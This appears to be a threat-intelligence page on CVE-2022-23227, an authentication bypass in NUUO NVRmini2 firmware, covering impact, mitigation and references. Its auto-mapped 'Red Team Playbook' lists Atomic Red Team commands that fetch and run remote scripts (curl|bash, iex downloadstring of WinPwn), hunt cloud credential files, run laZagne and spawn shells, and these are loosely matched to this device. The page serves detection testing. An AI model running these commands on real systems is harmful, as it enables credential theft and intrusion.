CVE-2022-23227
Overview
This vulnerability is an authentication bypass combined with insecure file handling in the NUUO NVRmini2 firmware. The root cause lies in the lack of authentication enforcement on the handle_import_user.php endpoint, which processes encrypted TAR archives for user import. This flaw affects the user management component, allowing unauthorized manipulation of user accounts and arbitrary file overwrites under the web root when chained with another vulnerability.
Vulnerability Description
NUUO NVRmini2 through 3.11 allows an unauthenticated attacker to upload an encrypted TAR archive, which can be abused to add arbitrary users because of the lack of handle_import_user.php authentication. When combined with another flaw (CVE-2011-5325), it is possible to overwrite arbitrary files under the web root and achieve code execution as root.
Impact
An unauthenticated attacker can leverage this vulnerability to create arbitrary user accounts and overwrite critical files on the device's web root, ultimately achieving full root-level code execution. No prior authentication or user interaction is required, enabling complete system compromise. This can result in unauthorized access to surveillance data, persistent backdoor installation, and potential lateral movement within the network, severely impacting confidentiality, integrity, and availability of the affected system.
Solution
Users should upgrade the NUUO NVRmini2 firmware to versions later than 3.11 where authentication checks on handle_import_user.php are enforced. Refer to the official advisories linked in the Rapid7 and GitHub disclosures for detailed patch instructions and updated Metasploit modules. Applying vendor-supplied firmware updates and disabling unused import functionalities until patches are applied are recommended to mitigate exploitation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in NUUO NVRmini2 firmware versions up to 3.11 presents a critical security flaw that allows unauthenticated attackers to upload an encrypted TAR archive. This is primarily due to inadequate authentication mechanisms associated with the handle_import_user.php script. The lack of proper access controls enables an attacker to exploit this weakness to add arbitrary users to the system. Furthermore, when this vulnerability is combined with an existing flaw that allows for arbitrary file overwrites under the web root, it creates a pathway for attackers to execute malicious code with root privileges. This dual exploitation scenario significantly amplifies the risk posed by the initial vulnerability, as it not only allows unauthorized access but also facilitates complete control over the affected device.
Attack vectors for this vulnerability are straightforward yet highly effective. An attacker can initiate the exploitation process by crafting a specially designed TAR archive that leverages the authentication bypass. Once uploaded, the attacker can then utilize the associated flaw to overwrite critical files within the web root directory, potentially replacing them with malicious scripts or binaries. This sequence of actions can lead to a complete compromise of the NVRmini2 device, allowing the attacker to execute arbitrary code. Given that many NVR systems are deployed in sensitive environments, such as surveillance systems in commercial and residential settings, the implications of such an attack can be severe. Attackers could manipulate video feeds, disable security measures, or even use the compromised device as a foothold for further attacks within the network.
The real-world impact of this vulnerability extends beyond the immediate technical ramifications. Organizations relying on NUUO NVRmini2 for video surveillance may face significant business risks, including data breaches, loss of customer trust, and potential legal liabilities. The ability for an attacker to gain root access to a device that is often connected to critical infrastructure raises alarms about the potential for broader network intrusions. Moreover, the exploitation of such vulnerabilities can lead to financial losses, not only from direct remediation costs but also from reputational damage and regulatory fines, particularly in industries governed by strict compliance requirements.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating firmware to the latest versions is crucial, as vendors often release patches to address known vulnerabilities. Additionally, network segmentation can help limit the exposure of vulnerable devices to the internet, reducing the attack surface. Employing intrusion detection systems (IDS) can also aid in identifying unusual patterns of behavior that may indicate an attempted exploitation of this vulnerability. Furthermore, organizations should conduct regular security audits and penetration testing to uncover potential weaknesses in their systems before they can be exploited by malicious actors.
In conclusion, the vulnerability present in NUUO NVRmini2 firmware represents a significant threat to organizations utilizing these devices for surveillance and security purposes. The combination of authentication bypass and arbitrary file overwrite capabilities creates a potent risk that can lead to severe consequences. By understanding the technical details, potential attack vectors, and implementing robust detection and mitigation strategies, organizations can better protect themselves against this and similar vulnerabilities, ensuring the integrity and security of their critical systems.
CSURFACE threat intelligence has identified a marked escalation in activity related to CVE-2022-23227, coinciding with its recent inclusion in the CISA Known Exploited Vulnerabilities (KEV) catalog. This formal recognition underscores the vulnerability’s criticality and elevates its priority for organizational risk management. Our telemetry indicates that exploit attempts, while not yet widespread, have increased sufficiently to warrant heightened vigilance. The updated CVSS score of 9.8 reflects the vulnerability’s potential for full system compromise through unauthenticated user addition and arbitrary file overwrite, which can lead to root-level code execution. Additionally, the emergence of a significant EPSS score near the 99th percentile signals a growing likelihood of exploitation in the wild, despite a slight recent decline in exploit trend. This shift in the threat landscape demands that defenders reassess their exposure to affected NUUO NVRmini2 devices, as the convergence of these factors substantially raises the risk profile. Although no new exploit variants or ransomware associations have been confirmed, the combination of increased detection and formal cataloging by CISA elevates CVE-2022-23227 from a theoretical to a practical threat, necessitating urgent attention within security operations.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Nuuo | Nvrmini2 Firmware | All |
cpe:2.3:o:nuuo:nvrmini2_firmware:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
3 eventsSighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (6)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-23227 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/pedrib/PoC/blob/master/advisories/NUUO/nuuo_nvrmini_round2.mkd |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/rapid7/metasploit-framework/pull/16044 |
| portswigger.net |
GitHub CVE
x_refsource_MISC
|
https://portswigger.net/daily-swig/researcher-discloses-alleged-zero-day-vulnerabilities-in-nuuo-nvrmini2-recording-device |
| news.ycombinator.com |
GitHub CVE
x_refsource_MISC
|
https://news.ycombinator.com/item?id=29936569 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2022-23227 |